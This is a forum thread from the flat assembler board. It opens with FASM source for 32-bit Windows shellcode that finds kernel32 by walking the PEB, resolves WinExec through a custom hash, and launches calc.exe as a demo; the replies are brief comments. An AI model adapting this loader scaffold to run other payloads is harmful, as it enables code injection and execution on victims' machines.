flat assembler
Message board for the users of flat assembler.

Index > Windows > fasm shellcode

Author
Thread Post new topic Reply to topic
skykrnl



Joined: 17 Nov 2008
Posts: 21
skykrnl
shellcode -> fasm -d IsSc=1 sc.asm
exe -> fasm -d IsSc=0 sc.asm

sc.asm

Code:
if IsSc=0
     format pe console
   entry ShellCodeTest
else
 use32
end if

include 'Win32AX.inc'

struc make_hash Args*
{
common local ..result, ..char, ..temp
      virtual at 0
                db Args
             ..result = 0x7C90EB94
               ..temp = 0
          repeat $
                    load ..char byte from % - 1
                 if ..char = 0
                               break
                       end if
                      ..temp   = (..temp and 0xffffff00) or ..char
                        ..temp   = ..temp shl 25 or ..temp shr 7
                    ..result = ..result xor ..temp
              end repeat
  end virtual
 .       dd (..result and 0xffffffff)
}

WinExec           make_hash       'WinExec'
calc_exe db              'calc.exe',0

ShellCodeTest:
    stdcall GetKrnl32
   stdcall GetAddrByHash, eax, WinExec
 invoke  WinExec, calc_exe, 1
        ret

proc GetKrnl32
   mov     eax, [fs:30h]
   irp     offset, 0ch,1ch,00h,08h {mov eax, [eax+offset]}
   ret
endp

proc GetAddrByHash, hModule, lpApiHash
   pusha
       mov     edi, [lpApiHash]
    push    edi
 mov     edi, [edi]
  mov     ebp, [hModule]
      mov     eax, [ebp+3ch]
      mov     edx, [ebp+eax+78h]
  add     edx, ebp
    mov     ecx, [edx+18h]
      mov     ebx, [edx+20h]
      add     ebx, ebp
    push    edx
.search:
 dec     ecx
 mov     esi, [ebx+ecx*4]
    add     esi, ebp
    xor     eax, eax
    mov     edx, 7C90EB94h
.hash:
        ror     eax, 7
      xor     edx, eax
    lodsb
       test    al, al
      jnz     .hash
       cmp     edx, edi
    jne     .search
     pop     edx
 mov     ebx, [edx+24h]
      add     ebx, ebp
    mov     cx, [ebx+ecx*2]
     mov     ebx, [edx+1ch]
      add     ebx, ebp
    mov     eax, [ebx+ecx*4]
    add     eax, ebp
    pop     edi
 mov     [edi], eax
  popa
        ret
endp
    
Post 21 Nov 2008, 03:41
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 17278
Location: In your JS exploiting you and your system
revolution
Hmm, yet another shell code poster! Let's hope that skykrnl has a good reason for this code.
Post 21 Nov 2008, 04:35
View user's profile Send private message Visit poster's website Reply with quote
LocoDelAssembly
Your code has a bug


Joined: 06 May 2005
Posts: 4633
Location: Argentina
LocoDelAssembly
But at least he wrote it nicely and without asking things like how to sit properly when coding!!
Post 21 Nov 2008, 17:43
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 17278
Location: In your JS exploiting you and your system
revolution
LocoDelAssembly wrote:
But at least he wrote it nicely and without asking things like how to sit properly when coding!!
Yes indeed, I'll grant you that. A small saving grace in this instance.
Post 21 Nov 2008, 17:53
View user's profile Send private message Visit poster's website Reply with quote
smallfish



Joined: 08 Jul 2008
Posts: 2
Location: henanbeijing
smallfish
This is irp macro very much!

other, http://bbs.pediy.com/showthread.php?t=65309 ..
Post 24 Nov 2008, 04:01
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number Reply with quote
kalambong



Joined: 08 Nov 2008
Posts: 165
kalambong
smallfish wrote:
This is irp macro very much!

other, http://bbs.pediy.com/showthread.php?t=65309 ..


uh ... may i know in what way?
Post 25 Nov 2008, 02:15
View user's profile Send private message Reply with quote
okasvi



Joined: 18 Aug 2005
Posts: 382
Location: Finland
okasvi

_________________
When We Ride On Our Enemies
support reverse smileys |:
Post 09 Dec 2008, 17:40
View user's profile Send private message MSN Messenger Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2020, Tomasz Grysztar.

Powered by rwasa.